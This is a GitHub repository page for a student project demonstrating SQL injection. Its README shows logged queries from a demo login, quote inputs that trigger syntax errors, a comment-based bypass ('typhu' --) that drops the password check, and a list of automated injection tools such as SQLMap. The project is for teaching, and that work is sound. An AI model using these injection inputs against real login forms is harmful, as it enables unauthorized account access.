Skip to content

tquangsdh20/demo_sql_injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
.github
.github
 
 
src
src
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
MANIFEST.in
MANIFEST.in
 
 
README.md
README.md
 
 
setup.py
setup.py
 
 

Repository files navigation

Members:

  • Tran Quang
  • Nguyen Hoang Dinh Quy
  • Than Hai Nhat Minh
  • Nguyen Ty Phu

Introductions

What is the SQL Injection?

How does it effect?

Demo Attacks

Log in

user: quang
password: demo

Log output consule:

>> SELECT user
>>    ,checking
>>    ,savings
>> FROM accounts
>> WHERE "user" = 'typhu' AND "password" = 'demo' LIMIT 1;

Try with the other user

Try with any password testing

user: typhu
password: demo

Try with detect error

user: typhu
password: demo'

Analysis log output

SELECT user
    ,checking
    ,savings
FROM accounts
WHERE "user" = 'typhu' AND "password" = 'demo'' LIMIT 1;

Try with detect error

user: typhu'
password: demo

SELECT user
    ,checking
    ,savings
FROM accounts
WHERE "user" = 'typhu'' AND "password" = 'demo' LIMIT 1;

Add comment

WHERE "user" = 'typhu' --' AND "password" = 'demo' LIMIT 1;

Hacking Tools

  • SQLMap : Automatic SQL Injection And Database Takeover Tool
  • jSQL Injection : Java Tool For Automatic SQL Database Injection
  • BBQSQL : A Blind SQL Injection Exploitation Tool
  • NoSQLMap : Automated NoSQL Database Pwnage

How to protect your database from SQL Injection

About

Demo SQL Injection for Database Security

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages